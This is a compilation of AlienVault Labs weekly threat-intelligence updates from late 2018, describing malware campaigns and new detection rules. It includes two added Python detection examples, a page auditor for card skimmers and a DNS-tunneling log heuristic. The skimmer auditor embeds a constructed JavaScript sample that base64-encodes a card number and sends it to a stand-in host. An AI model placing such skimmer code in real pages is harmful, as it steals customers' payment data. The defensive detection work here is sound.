
  • AlienVault Labs Threat Intelligence Update for USM Appliance: December 9 – December 15, 2018

    New Detection Techniques - RedControle

    RedControle is a Russian-made backdoor, keylogger, and stealer programmed in Delphi. This particular malware has been found targeting Russian oil, gas, chemical, and agricultural businesses, in addition to major Russian financial exchanges. RedControle uses two command and control servers and can communicate with them via HTTP or HTTPS. According to Cylance, one of the two command and control servers is used to receive commands, while the other is used for exfiltration. It has also been noted that RedControle is tied to other campaigns targeting the Russian Steam and CounterStrike community.

    We've added NIDS signatures and the following correlation rules as a result of RedControle activity:
    • System Compromise, Trojan infection, RedControle Inbound
    • System Compromise, Trojan infection, RedControle Outbound

    New Detection Techniques - Olympic Vision Keylogger

    Olympic Vision is a piece of malware written in .NET that was recently discovered in a campaign targeting multiple organizations across 18 countries. The malware is usually delivered in spear-phishing emails with a lure document attached. Olympic Vision can steal keystrokes, clipboard contents, screenshots, and credentials stored by browsers, email, FTP, and instant messaging clients. For its exfiltration channels, Olympic Vision uses email, FTP, or HTTP.

    We've added NIDS signatures and the following correlation rules as a result of Olympic Vision activity:
    • System Compromise, Trojan infection, Olympic Vision Keylogger

    New Detection Techniques - Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of recent malicious activity:
    • System Compromise, Trojan infection, Bread and Butter
    • System Compromise, Trojan infection, ELF/Samba
    • System Compromise, Trojan infection, FIN7 GRIFFON
    • System Compromise, Trojan infection, Huitau Outbound
    • System Compromise, Trojan infection, MSIL.Cordis.Stealer
    • System Compromise, Trojan infection, Trojan.Agent.DHUP
    • System Compromise, Trojan infection, VBS.Dunihi
    • System Compromise, Trojan infection, W32.DriverLnk

    New Detection Techniques - Remote Access Tools

    We've added NIDS signatures and the following correlation rules as a result of recent malicious activity:
    • System Compromise, Malware RAT, Async
    • System Compromise, Malware RAT, MSIL.NombreRAT

    New Detection Techniques - Mobile Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of recent malicious activity:
    • System Compromise, Mobile trojan infection, Android/Nineap.b
    • System Compromise, Mobile trojan infection, AndroidOS.Agent

    New Detection Techniques

    We've added NIDS signatures and the following correlation rules as a result of recent malicious activity:
    • Exploitation & Installation, Service Exploit, HP Intelligent Management Java Deserialization RCE
    • Exploitation & Installation, Vulnerable software, Google Chrome Pdfium JPEG2000 Heap Overflow
    • System Compromise, Botnet infection, ShieldPush
    • System Compromise, Botnet infection, Win32/HentaiBot
    • System Compromise, C&C Communication, More_eggs SSL activity
    • System Compromise, Malware infection, W32/Pcarrier.A
    • System Compromise, Ransomware infection, Lucky Ransomware

    Updated Detection Techniques - Trojan Infection

    We've updated NIDS signatures and the following correlation rules as a result of recent malicious activity:
    • System Compromise, Trojan infection, Adload
    • System Compromise, Trojan infection, DarkVNC
    • System Compromise, Trojan infection, FIN7 Griffon
    • System Compromise, Trojan infection, Hawkeye Keylogger
    • System Compromise, Trojan infection, MSIL/SocketPlayer RAT
    • System Compromise, Trojan infection, Ursniff
    • System Compromise, Trojan infection, Kimsuky
    • System Compromise, Trojan infection, MSIL/Mintluks.A
    • System Compromise, Trojan infection, NanoCore RAT
    • System Compromise, Trojan infection, Nemucod
    • System Compromise, Trojan infection, Trickbot

    Updated Detection Techniques - Mobile Trojan Infection

    We've updated NIDS signatures and the following correlation rules as a result of recent malicious activity:
    • System Compromise, Mobile trojan infection, Android/TrojanDropper.Agent.BL
    • System Compromise, Mobile trojan infection, Asacub.a Banker

    Updated Detection Techniques - C&C Communication

    We've updated our IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:
    • System Compromise, C&C Communication, BrushaLoader SSL
    • System Compromise, C&C Communication, Cobalt Group
    • System Compromise, C&C Communication, HuadhServHelper SSL
    • System Compromise, C&C Communication, Known malicious SSL certificate
    • System Compromise, C&C Communication, More Eggs
    • System Compromise, C&C Communication, IcedID

    Updated Detection Techniques

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Malware infection, CoinMiner
  • AlienVault Labs Threat Intelligence Update for USM Anywhere: December 9 – December 15, 2018

    New Detection Techniques - RedControle

    RedControle is a Russian-made backdoor, keylogger, and stealer programmed in Delphi. This particular malware has been found targeting Russian oil, gas, chemical, and agricultural businesses, in addition to major Russian financial exchanges. RedControle uses two command and control servers and can communicate with them via HTTP or HTTPS. According to Cylance, one of the two command and control servers is used to receive commands, while the other is used for exfiltration. It has also been noted that RedControle is tied to other campaigns targeting the Russian Steam and CounterStrike community.

    We've added NIDS signatures and updated the following correlation rule as a result of RedControle activity:
    • System Compromise, Malware, Trojan Infection

    New Detection Techniques - Olympic Vision Keylogger

    Olympic Vision is a piece of malware written in .NET that was recently discovered in a campaign targeting multiple organizations across 18 countries. The malware is usually delivered in spear-phishing emails with a lure document attached. Olympic Vision can steal keystrokes, clipboard contents, screenshots, and credentials stored by browsers, email, FTP, and instant messaging clients. For its exfiltration channels, Olympic Vision uses email, FTP, or HTTP.

    We've added NIDS signatures and updated the following correlation rule as a result of Olympic Vision activity:
    • System Compromise, Malware, Trojan Infection

    New Detection Techniques - Trojan Infection

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Bread and Butter, ELF/Samba, FIN7 GRIFFON, Huitau Outbound, MSIL.Cordis.Stealer, Trojan.Agent.DHUP, VBS.Dunihi, and W32.DriverLnk:
    • System Compromise, Malware, Trojan Infection

    New Detection Techniques - Remote Access Tools

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Async and MSIL.NombreRAT:
    • System Compromise, Malware Infection, Remote Access Trojan Infection

    New Detection Techniques - Mobile Trojan Infection

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Android/Nineap.b and AndroidOS.Agent:
    • System Compromise, Malware, Trojan Infection

    New Detection Techniques

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity:
    • System Compromise, Malware, Trojan Infection
    • System Compromise, Malware, Ransomware Infection
    • Exploitation & Installation, Service Exploit, Code Execution

    Updated Detection Techniques - Trojan Infection

    We've updated NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Adload, DarkVNC, FIN7 Griffon, Hawkeye Keylogger, MSIL/SocketPlayer RAT, Ursniff, Kimsuky, MSIL/Mintluks.A, NanoCore RAT, Nemucod, and Trickbot:
    • System Compromise, Malware, Trojan Infection

    Updated Detection Techniques - Mobile Trojan Infection

    We've updated NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Android/TrojanDropper.Agent.BL and Asacub.a Banker:
    • System Compromise, Malware, Trojan Infection

    Updated Detection Techniques - C&C Communication

    We've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities:
    • System Compromise, Malware, Suspicious SSL Certificate

    Updated Detection Techniques

    We've updated NIDS signatures and updated the following correlation rule as a result of additional recent malicious activity, including CoinMiner:
    • System Compromise, Malware, Trojan Infection
  • AlienVault Labs Threat Intelligence Update for USM Anywhere: December 2 – December 8, 2018

    New Detection Techniques - MageCart

    Magecart refers to a mode of attacker operation that focuses on skimming card data (or any other type of data available) from payment websites. This technique has been used by many different groups that have evolved over time, pursuing a wide range of data types such as credit cards, credentials, PII, and more. The attackers typically inject code into the infected webpage that captures and exfiltrates the targeted data before it is encrypted. During the past few months, several international companies have suffered this kind of breach, involving customer data loss and credit card data theft.
    This week's new rules include detections for systems compromised during the infection process as well as during exfiltration.

    We've added NIDS signatures and updated the following correlation rule as a result of MageCart activity:
    • System Compromise, Malware, Trojan Infection

    New Detection Techniques - Trojan Infection

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Astaroth, Canahom.A, MSIL/Criador, MSIL/PartsMiner, STOLENPENCIL, Win32.Black.eoxqwe, Win32.ZZZ1.Stealer, Win32/GodNet, and Win32/LittleTimmy:
    • System Compromise, Malware, Trojan Infection

    New Detection Techniques - Remote Access Tools

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Nemours RAT and Win32/SteamStealerRAT:
    • System Compromise, Malware Infection, Remote Access Trojan Infection

    New Detection Techniques - Mobile Trojan Infection

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Android.Monitor.Cansy.A, Android.Trojan.AutoSMS, Android.Trojan.JSmsHider, Android/Autoins, and Trojan.AndroidOS.AVPass.k:
    • System Compromise, Malware, Trojan Infection

    New Detection Techniques

    We've added NIDS signatures and updated the following correlation rules as a result of recent malicious activity:
    • Exploitation & Installation, Exploit, Code Execution
    • System Compromise, Malware Infection, Ransomware
    • System Compromise, Malware, Suspicious SSL Certificate
    • System Compromise, Malware, Trojan Infection

    Updated Detection Techniques - Oilrig

    The Middle Eastern APT group Oilrig, also known as APT34, has been active during the last few years, attacking governments and businesses in the Middle East. Recently, they have been sending phishing emails with attached Word documents. The macro inside the Word document executes a PowerShell script, which uses DNS tunneling to communicate with the Command and Control server. A DNS tunneling attack injects covert information in DNS queries and responses, disguised as normal traffic. The main advantage of using this technique is communicating through a trusted protocol that is commonly overlooked by security teams and can bypass most firewalls.

    Oilrig uses DNS tunneling to covertly send and receive commands from the attacker.

    We've updated NIDS signatures and updated the following correlation rule as a result of Oilrig activity:
    • System Compromise, Malware, APT

    Updated Detection Techniques - Remote Access Tools

    We've updated NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Remcos/Remvio:
    • System Compromise, Malware Infection, Remote Access Trojan Infection

    Updated Detection Techniques - Trojan Infection

    We've updated NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including AZORult, Generic Stealer, Malicious Ethereum, Obfuscated PowerShell Inbound, Unruy, and Zebrocy:
    • System Compromise, Malware, Trojan Infection

    Updated Detection Techniques - Mobile Trojan Infection

    We've updated NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Android Rootnik-AI, Android.Trojan.InfoStealer.MT, Android/GoldenTouch.A!tr, Android/Hiddad.QO, Anubis Android Loader, Asacub.a Banker, and Trojan-SMS.AndroidOS.Opfake:
    • System Compromise, Malware, Trojan Infection

    Updated Detection Techniques - C&C Communication

    We've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities, including APT28 SSL activity, BrushaLoader SSL, Cobalt Group SSL, CobaltStrike SSL activity, MalDoc, Malicious SSL Cert (sLoad), Meterpreter SSL Certificate, and Ursnif SSL activity:
    • System Compromise, Malware, Suspicious SSL Certificate

    Updated Detection Techniques

    We've updated NIDS signatures and updated the following correlation rules as a result of recent malicious activity, including Certutil Retrieving EXE, CoinMiner, Golroted, and phishing activity:
    • Delivery & Attack, Malware Infection, Phishing
    • System Compromise, Malware Infection, Downloader
    • System Compromise, Malware Infection, Suspicious Powershell
    • System Compromise, Malware Infection, Suspicious Traffic
    • System Compromise, Malware Infection, Trojan
  • AlienVault Labs Threat Intelligence Update for USM Appliance: December 2 – December 8, 2018

    New Detection Techniques - MageCart

    Magecart refers to a mode of attacker operation that focuses on skimming card data (or any other type of data available) from payment websites. This technique has been used by many different groups that have evolved over time, pursuing a wide range of data types such as credit cards, credentials, PII, and more. The attackers typically inject code into the infected webpage that captures and exfiltrates the targeted data before it is encrypted. During the past few months, several international companies have suffered this kind of breach, involving customer data loss and credit card data theft.
    This week's new rules include detections for systems compromised during the infection process as well as during exfiltration.

    We've added NIDS signatures and the following correlation rules as a result of MageCart activity:
    • System Compromise, Trojan infection, MageCart
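
    Both MageCart entries above describe the same mechanism: script injected into a checkout page that reads payment fields and posts them to an attacker-controlled host before the browser ever encrypts them to the merchant. The following is an added example, not AlienVault's code or part of these rules, of the kind of page audit a defender can run against a checkout page's HTML: it lists every external script origin that is not on a first-party allowlist, and flags inline scripts that both touch form or payment fields and reference a host outside that allowlist. The page HTML, the allowlist and every hostname in it are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed first-party allowlist: hosts that are expected to serve script on the checkout page.
FIRST_PARTY_ORIGINS = {"shop.example", "static.shop.example", "js.payments-example.test"}

# Constructed checkout page. One third-party script and one inline snippet play the role of
# an injected skimmer; all hostnames are invented for this example.
SAMPLE_PAGE = """
<html><head>
<script src="https://static.shop.example/app.js"></script>
<script src="https://js.payments-example.test/v3/checkout.js"></script>
<script src="https://cdn-analytics-example.invalid/track.js"></script>
</head><body>
<form id="checkout">
  <input name="cardnumber"><input name="cvc"><input name="expiry">
</form>
<script>
/* constructed sample of skimmer-like inline code */
document.querySelector('#checkout').addEventListener('submit', function (e) {
  var payload = btoa(document.querySelector('[name=cardnumber]').value);
  new Image().src = 'https://cdn-analytics-example.invalid/p?d=' + payload;
});
</script>
<script>console.log('page ready');</script>
</body></html>
"""

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
FORM_HOOKS = ("addEventListener('submit'", "onsubmit", "keyup", "keydown")
ENCODING_CALLS = ("btoa(", "encodeURIComponent(", "JSON.stringify(")
PAYMENT_FIELDS = ("cardnumber", "card_number", "cvc", "cvv", "expiry")


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []   # values of src= on <script> tags
        self.inline = []     # bodies of <script> tags without src=
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # Script content may arrive in several chunks; buffer until the closing tag.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def audit_page(html, allowed_hosts):
    """Return (kind, host) findings: external scripts from hosts outside the allowlist,
    and inline scripts that show at least two skimmer traits (form hook, encoding call,
    payment-field access) and reference a host outside the allowlist."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname or ""
        if host not in allowed_hosts:
            findings.append(("external-script", host))
    for body in parser.inline:
        traits = sum([
            any(h in body for h in FORM_HOOKS),
            any(c in body for c in ENCODING_CALLS),
            any(f in body.lower() for f in PAYMENT_FIELDS),
        ])
        foreign = sorted({h for h in URL_RE.findall(body) if h not in allowed_hosts})
        if traits >= 2 and foreign:
            findings.append(("inline-skimmer", ",".join(foreign)))
    return findings


if __name__ == "__main__":
    for kind, host in audit_page(SAMPLE_PAGE, FIRST_PARTY_ORIGINS):
        print(f"{kind}: {host}")
```

    The allowlist is the control that makes this useful: a checkout page has a small, known set of script origins, so anything else is worth an alert, and the same list is what a Content-Security-Policy `script-src` directive would enforce in the browser. Skimmers that are appended to a legitimate first-party file rather than injected as a new tag will not show up as a new origin, which is why the inline-trait check exists and why the first-party bundles themselves should be hash-pinned or diffed against a known-good copy.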

    New Detection Techniques - Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Trojan infection, Astaroth
    • System Compromise, Trojan infection, Canahom.A
    • System Compromise, Trojan infection, MSIL/Criador
    • System Compromise, Trojan infection, MSIL/PartsMiner
    • System Compromise, Trojan infection, STOLENPENCIL
    • System Compromise, Trojan infection, Win32.Black.eoxqwe
    • System Compromise, Trojan infection, Win32.ZZZ1.Stealer
    • System Compromise, Trojan infection, Win32/GodNet
    • System Compromise, Trojan infection, Win32/LittleTimmy

    New Detection Techniques - Remote Access Tools

    We've added NIDS signatures and the following correlation rules as a result of recent malicious activity:
    • System Compromise, Malware RAT, Nemours RAT
    • System Compromise, Malware RAT, Win32/SteamStealerRAT

    New Detection Techniques - Mobile Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Mobile trojan infection, Android.Monitor.Cansy.A
    • System Compromise, Mobile trojan infection, Android.Trojan.AutoSMS
    • System Compromise, Mobile trojan infection, Android.Trojan.JSmsHider
    • System Compromise, Mobile trojan infection, Android/Autoins
    • System Compromise, Mobile trojan infection, Trojan.AndroidOS.AVPass.k

    New Detection Techniques

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Adobe Flash Use-After-Free FWS Inbound (CVE-2018-15982)
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Konica Minolta FTP Buffer Overflow Attempt (CVE-2015-7768)
    • System Compromise, Botnet infection, DemonBot
    • System Compromise, C&C Communication, Critical Infr. APT 17-10-2018
    • System Compromise, C&C Communication, PS.APT.PhishDoc.TR Response
    • System Compromise, C&C Communication, PS.APT.PhishDoc.TR
    • System Compromise, C&C Communication, PowerEnum
    • System Compromise, Ransomware infection, WeChat (Ransomware/Stealer)

    Updated Detection Techniques - Oilrig

    The Middle Eastern APT group Oilrig, also known as APT34, has been active during the last few years, attacking governments and businesses in the Middle East. Recently, they have been sending phishing emails with attached Word documents. The macro inside the Word document executes a PowerShell script, which uses DNS tunneling to communicate with the Command and Control server. A DNS tunneling attack injects covert information in DNS queries and responses, disguised as normal traffic. The main advantage of using this technique is communicating through a trusted protocol that is commonly overlooked by security teams and can bypass most firewalls.

    Oilrig uses DNS tunneling to covertly send and receive commands from the attacker.

    We've updated NIDS signatures and the following correlation rule as a result of Oilrig activity:
    • System Compromise, Trojan infection, Oilrig

    Updated Detection Techniques - Remote Access Tools

    We've updated NIDS signatures and the following correlation rule as a result of additional recent malicious activity:
    • System Compromise, Malware RAT, Remcos/Remvio

    Updated Detection Techniques - Trojan Infection

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Trojan infection, AZORult
    • System Compromise, Trojan infection, Generic Stealer
    • System Compromise, Trojan infection, Malicious Ethereum
    • System Compromise, Trojan infection, Obfuscated PowerShell Inbound
    • System Compromise, Trojan infection, Unruy
    • System Compromise, Trojan infection, Zebrocy

    Updated Detection Techniques - Mobile Trojan Infection

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Mobile trojan infection, Android Rootnik-AI
    • System Compromise, Mobile trojan infection, Android.Trojan.InfoStealer.MT
    • System Compromise, Mobile trojan infection, Android/GoldenTouch.A!tr
    • System Compromise, Mobile trojan infection, Android/Hiddad.QO
    • System Compromise, Mobile trojan infection, Anubis Android Loader
    • System Compromise, Mobile trojan infection, Asacub.a Banker
    • System Compromise, Mobile trojan infection, Trojan-SMS.AndroidOS.Opfake

    Updated Detection Techniques - C&C Communication

    We've updated our IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:
    • System Compromise, C&C Communication, APT28 SSL activity
    • System Compromise, C&C Communication, BrushaLoader SSL
    • System Compromise, C&C Communication, Cobalt Group SSL
    • System Compromise, C&C Communication, CobaltStrike SSL activity
    • System Compromise, C&C Communication, MalDoc
    • System Compromise, C&C Communication, Malicious SSL Cert (sLoad)
    • System Compromise, C&C Communication, Meterpreter SSL Certificate
    • System Compromise, C&C Communication, Ursnif SSL activity

    Updated Detection Techniques

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • Delivery & Attack, Malicious website, Phishing activity
    • Delivery & Attack, Suspicious Behaviour, Certutil Retrieving EXE
    • System Compromise, Malware infection, CoinMiner
    • System Compromise, Malware infection, Golroted
  • AlienVault Labs Threat Intelligence Update for USM Anywhere: November 25 – December 1, 2018

    New Detection Techniques - DNSpionage

    DNSpionage is the name of an HTTP/DNS espionage campaign targeting several Middle Eastern countries and companies. This campaign uses fake job posting websites to deliver malicious RTF documents to the applicants.

    The infection occurs when the user tries to open one of the malicious files, which contains an application form bundled with an obfuscated macro script. This macro acts as a dropper for an encoded executable file. It also creates a scheduled task to execute the malware every minute.

    The malware then gathers system information and files, and will try to leak them using either HTTP or DNS tunneling. It can also act as an agent, interpreting a set of commands sent by the server to perform actions such as downloading additional scripts and utilities onto the machine. The HTTP mode generates traffic to the domain 0ffice36o[.]com. Since the encoded commands are embedded in the domain name prefix, the DNS channel can also be used to send and receive C&C traffic.

    We've added NIDS signatures and updated the following correlation rule as a result of DNSpionage activity:
    • System Compromise, Malware, Trojan Infection
    Related content in Open Threat Exchange: https://otx.alienvault.com/pulse/5c02eefdd2d9ca140a3c959e
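
    The Oilrig entries and the DNSpionage entry above describe the same channel: data or commands encoded into the leftmost labels of a query name, so that each "lookup" carries a chunk of the conversation. The following is an added example, not AlienVault's code or part of the correlation rules, of a resolver-log heuristic a defender can use to surface that pattern without any signature: per registered domain it measures how long, how high-entropy and how rarely repeated the query prefixes are. Tunnels need many distinct, long, dense prefixes; ordinary hostnames do not. The log format (`<epoch> <client_ip> <qtype> <qname>`) and every domain in the sample are constructed for the example, and "registered domain" is approximated as the last two labels rather than looked up in a public-suffix list.

```python
import math
from collections import defaultdict

# Constructed resolver log, one query per line: "<epoch> <client_ip> <qtype> <qname>".
# All domains below are invented for this example; none is an indicator from the advisory.
# The six TXT prefixes are 32-character strings in which each hex digit occurs exactly twice.
SAMPLE_LOG = """\
1544140800 10.0.0.15 A www.example.com
1544140801 10.0.0.15 A mail.example.com
1544140802 10.0.0.15 A cdn.example.com
1544140803 10.0.0.15 A api.example.com
1544140804 10.0.0.15 A www.example.com
1544140805 10.0.0.15 A example.com
1544140810 10.0.0.21 TXT 0123456789abcdeffedcba9876543210.updates-example.test
1544140811 10.0.0.21 TXT 123456789abcdef00fedcba987654321.updates-example.test
1544140812 10.0.0.21 TXT 23456789abcdef0110fedcba98765432.updates-example.test
1544140813 10.0.0.21 TXT 3456789abcdef012210fedcba9876543.updates-example.test
1544140814 10.0.0.33 TXT 456789abcdef01233210fedcba987654.updates-example.test
1544140815 10.0.0.33 TXT 56789abcdef0123443210fedcba98765.updates-example.test
this line is malformed and must be skipped
"""


def shannon_entropy(text):
    """Bits of entropy per character of text (0.0 for empty or single-symbol strings)."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Split a query name into (subdomain_prefix, registered_domain).
    Assumption for this example: the registered domain is the last two labels."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def parse_log(text):
    """Yield (client_ip, qtype, qname) for each well-formed line; skip anything else."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        _ts, client, qtype, qname = parts
        yield client, qtype, qname


def profile_domains(text):
    """Per registered domain: query count, distinct prefixes, mean prefix length and entropy."""
    acc = {}
    for _client, _qtype, qname in parse_log(text):
        prefix, domain = split_name(qname)
        s = acc.setdefault(domain, {"queries": 0, "prefixes": set(), "len_sum": 0, "ent_sum": 0.0})
        s["queries"] += 1
        s["prefixes"].add(prefix)
        s["len_sum"] += len(prefix)
        s["ent_sum"] += shannon_entropy(prefix.replace(".", ""))
    return {
        domain: {
            "queries": s["queries"],
            "distinct_prefixes": len(s["prefixes"]),
            "mean_prefix_len": s["len_sum"] / s["queries"],
            "mean_prefix_entropy": s["ent_sum"] / s["queries"],
        }
        for domain, s in acc.items()
    }


def suspected_tunnels(text, min_queries=5, min_len=20, min_entropy=3.5, min_unique_ratio=0.8):
    """Registered domains whose traffic looks like tunneling: enough queries, almost every
    one carrying a different long, high-entropy prefix. Thresholds are starting points
    to tune against a site's own baseline."""
    flagged = []
    for domain, s in profile_domains(text).items():
        if s["queries"] < min_queries:
            continue
        unique_ratio = s["distinct_prefixes"] / s["queries"]
        if (s["mean_prefix_len"] >= min_len
                and s["mean_prefix_entropy"] >= min_entropy
                and unique_ratio >= min_unique_ratio):
            flagged.append(domain)
    return sorted(flagged)


if __name__ == "__main__":
    for domain, stats in profile_domains(SAMPLE_LOG).items():
        print(domain, stats)
    print("suspected tunnels:", suspected_tunnels(SAMPLE_LOG))
```

    The unique-prefix ratio is what separates a tunnel from a busy but legitimate zone: a tunnel almost never repeats a label because each one is fresh payload, whereas hostnames under a real domain are queried again and again. Expect false positives from CDNs, anti-spam DNSBLs and software that encodes client identifiers into hostnames, so the sensible deployment is an allowlist of known encoders plus review of anything new, rather than blocking on the heuristic alone.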

    New Detection Techniques - Responder.py

    SpiderLabs Responder is a project freely available on GitHub that contains the logic to launch a rogue authentication server compatible with several Microsoft network protocols such as NTLM. It can be used to poison LLMNR, NetBIOS Name Service, and mDNS packets.

    This NBT-NS/LLMNR Responder has been publicly available for four years. During this time, it has extended its functionality, so it can act as a great variety of MS-oriented network nodes. This includes SMB/MSSQL/HTTPS/LDAP/FTP authentication servers, DNS server, WPAD proxy server, ICMP redirector, rogue DHCP server, and network analyzer.

    We've added NIDS signatures and updated the following correlation rule as a result of NTLM Responder activity:
    • Exploitation & Installation, Malware Infection, Hacking Tool

    New Detection Techniques - C&C Communication

    We've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities:
    • System Compromise, Malware, Suspicious SSL Certificate

    New Detection Techniques

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Apoxas Stealer, Neozhvnc, PowerShell/BlasterEgg, SYSCON, Trojan/Kiaja.a, W32.Sarwent, and Win32/Phorpiex:
    • System Compromise, Malware Infection, Spyware
    • System Compromise, Malware Infection, Trojan
    • System Compromise, Malware Infection, Worm

    Updated Detection Techniques - Trojan Infection

    We've updated NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Banker IcedID, CobalStrike, MalDoc, MSIL/Lordix, MuddyWater, Obfuscated PowerShell Inbound, Qbot, and Zebrocy:
    • System Compromise, Malware, Trojan Infection

    Updated Detection Techniques

    We've updated NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including phishing activity, CoinMiner, Symmi, Asacub.a Banker, and Phorpiex:
    • Delivery & Attack, Malware Infection, Phishing
    • System Compromise, Malware Infection, Trojan
    • System Compromise, Malware Infection, Ransomware
  • AlienVault Labs Threat Intelligence Update for USM Appliance: November 18 – November 24, 2018

    New Detection Techniques - DarkGate

    DarkGate is a new malware family, initially targeting Spain and Portugal. The malware has multiple payload capabilities, including Cryptocurrency mining, Cryptocurrency stealing, Ransomware infection, keylogging, and remote access. During exploitation, it attempts to obtain as many credentials as possible by leveraging known credential stealer applications: Mail PassView, WebBrowserPassView, ChromeCookiesView, IECookiesView, MZCookiesView, BrowsingHistoryView, and SkypeLogView. Afterwards, it communicates those credentials to the Command & Control, along with other common data fields such as username, computer name, processor type, etc.

    Additionally, the malware has anti-detection capabilities. First, it will not run if the system doesn't have enough resources, since it automatically assumes it is in a VM under forensic investigation. Second, if it detects certain antivirus software, it will try to turn them off, or only execute certain capabilities not detected by that antivirus.

    We've added NIDS signatures and the following correlation rule as a result of DarkGate activity:
    • System Compromise, Trojan infection, DarkGate

    New Detection Techniques - PHPCMS 2008 (CVE-2018-19127)

    The Remote Code Execution vulnerability CVE-2018-19127 leverages a code injection vulnerability in /type.php in PHPCMS 2008. Attackers can send crafted requests to the vulnerable CMS. A lack of filtering in the source code allows all kinds of templates to go through and inject code into the system. Despite PHPCMS 2008 not being the latest version available, it is still a very common one.

    We've added NIDS signatures and the following correlation rules as a result of this activity:
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, PHPCMS 2008 (CVE-2018-19127)

    New Detection Techniques - Mobile Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Mobile trojan infection, Android/Agent.BAA
    • System Compromise, Mobile trojan infection, Android/Locker.PN
    • System Compromise, Mobile trojan infection, Trojan-SMS.AndroidOS.Agent.uf

    New Detection Techniques

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Acrobat (CVE-2018-15979)
    • Exploitation & Installation, Hacking tool, JS Downloader Using Wscript.Shell
    • System Compromise, C&C Communication, HuadhServHelper SSL
    • System Compromise, C&C Communication, JS.InfectedMikrotik
    • System Compromise, Malware infection, JS.InfectedMikrotik
    • System Compromise, Trojan infection, Esone CnC Beacon
    • System Compromise, Trojan infection, ExtremeDownloader
    • System Compromise, Trojan infection, Hades APT Downloader
    • System Compromise, Trojan infection, Win32/InstallMonster

    Updated Detection Techniques - Mobile Trojan Infection

    We've updated NIDS signatures and the following correlation rule as a result of additional recent malicious activity:
    • System Compromise, Mobile trojan infection, Android.Monitor.Puma

    Updated Detection Techniques - C&C Communication

    We've updated our IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:
    • System Compromise, C&C Communication, BrushaLoader SSL

    Updated Detection Techniques

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • Delivery & Attack, Malicious website, Phishing activity
    • System Compromise, Malware infection, CoinMiner
    • System Compromise, Ransomware infection, Kraken Ransomware
    • System Compromise, Targeted Malware, APT29
    • System Compromise, Targeted Malware, APT29 SSL Activity
    • System Compromise, Targeted Malware, OceanLotus
    • System Compromise, Trojan infection, BR.Banker
    • System Compromise, Trojan infection, Banload Downloader
  • AlienVault Labs Threat Intelligence Update for USM Anywhere: November 18 – November 24, 2018

    New Detection Techniques - DarkGate

    DarkGate is a new malware family, initially targeting Spain and Portugal. The malware has multiple payload capabilities, including Cryptocurrency mining, Cryptocurrency stealing, Ransomware infection, keylogging, and remote access. During exploitation, it attempts to obtain as many credentials as possible by leveraging known credential stealer applications: Mail PassView, WebBrowserPassView, ChromeCookiesView, IECookiesView, MZCookiesView, BrowsingHistoryView, and SkypeLogView. Afterwards, it communicates those credentials to the Command & Control, along with other common data fields such as username, computer name, processor type, etc.

